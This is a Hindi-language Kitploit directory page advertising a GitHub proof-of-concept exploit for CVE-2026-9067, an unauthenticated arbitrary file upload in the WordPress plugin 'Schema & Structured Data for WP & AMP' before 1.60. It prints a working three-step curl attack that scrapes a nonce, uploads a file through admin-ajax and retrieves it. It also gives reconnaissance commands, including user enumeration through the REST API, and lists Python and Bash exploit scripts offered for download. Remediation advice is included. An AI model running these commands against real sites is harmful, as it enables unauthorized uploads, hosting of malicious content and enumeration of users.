Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
By-Poloss..-..CVE-2026-9067 — WP और AMP के लिए स्कीमा और संरचित डेटा < 1.60 - अप्रमाणित मनमाना मीडिया अपलोड [POC और Xploit] | Kitploit
उपकरण/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

WP और AMP के लिए स्कीमा और संरचित डेटा < 1.60 - अप्रमाणित मनमाना मीडिया अपलोड [POC और Xploit]

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
313 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

POC & Xploit - प्रूफ ऑफ कॉन्सेप्ट निर्देशिका

वर्डप्रेस सुरक्षा परीक्षण वातावरण में पाए गए कमजोरियों के लिए दस्तावेज़ीकरण और शोषण।


कमजोरियों की सूची

CVE आईडीप्लगइनगंभीरताप्रकारस्थिति
CVE-2026-9067Schema & Structured Data for WP & AMPउच्च (8.1)अप्रतिबंधित फ़ाइल अपलोडदस्तावेज़ीकृत

CVE-2026-9067

त्वरित सारांश

क्षेत्रमान
CVE आईडीCVE-2026-9067
प्लगइनSchema & Structured Data for WP & AMP
प्रभावित संस्करण< 1.60
CWECWE-434 (खतरनाक प्रकार के साथ फ़ाइल का अप्रतिबंधित अपलोड)
CVSS v3.18.1 (उच्च)
खोजकर्ता0xBassia

कमजोरी का विवरण

प्लगइन Schema & Structured Data for WP & AMP संस्करण 1.60 से पहले फ़ाइल अपलोड के लिए AJAX हैंडलर पर उपयोगकर्ता क्षमता को मान्य नहीं करता है और अपलोड की गई फ़ाइल के प्रकार को मान्य नहीं करता है। यह गैर-प्रमाणित हमलावर को मनमानी फ़ाइल अपलोड करने की अनुमति देता है।

प्रभाव

  • सामग्री होस्टिंग: हमलावर पीड़ित के डोमेन पर दुर्भावनापूर्ण सामग्री होस्ट कर सकता है
  • डिस्क खपत: मनमानी फ़ाइल अपलोड डिस्क स्थान समाप्त कर सकता है
  • प्रतिष्ठा दुरुपयोग: पीड़ित के डोमेन से मैलवेयर, फ़िशिंग पृष्ठों का वितरण

महत्वपूर्ण नोट: WordPress कोर निष्पादन योग्य फ़ाइलों (.php, .phtml, .html, .svg) को ब्लॉक करता है, इसलिए इस कमजोरी से कोई सीधा RCE पथ नहीं है।

फ़ाइलें

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # पूर्ण दस्तावेज़ीकरण (यह फ़ाइल)
├── CVE-2026-9067.py       # मल्टी-थ्रेडिंग के साथ Python शोषण
├── CVE-2026-9067.sh       # Bash/Shell PoC स्क्रिप्ट
└── CVE-2026-9067_exploit.sh  # वैकल्पिक Bash PoC

त्वरित PoC

root@kitploit:~
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/main/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

पर्यावरण जानकारी

क्षेत्रमान
लक्ष्य URLhttps://yorbit7.ddev.site
PHP संस्करण8.4
डेटाबेसMariaDB 11.8
WordPress संस्करण7.0
परीक्षण विधिcurl-आधारित (ब्लैक-बॉक्स परीक्षण)

परीक्षण आदेश

साइट स्थिति जांचें

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

प्लगइन संस्करण जांचें

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

उपयोगकर्ताओं की गणना करें

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

सुधार

  1. प्लगइन अपग्रेड करें: Schema & Structured Data for WP & AMP को संस्करण 1.60 या उससे नए में अपडेट करें
  2. प्लगइन अक्षम करें: यदि अपग्रेड संभव नहीं है, तो प्लगइन को निष्क्रिय करें
  3. सख्तीकरण:
    • DISALLOW_FILE_MODIFICATIONS स्थिरांक सेट करें
    • .htaccess के माध्यम से अपलोड निर्देशिका में PHP निष्पादन अक्षम करें
    • WAF नियम लागू करें

संदर्भ

  • NVD CVE-2026-9067
  • WPScan Vulnerability Database
  • WordPress Plugin Page
  • मूल शोधकर्ता: 0xBassia
टूल डाउनलोड करें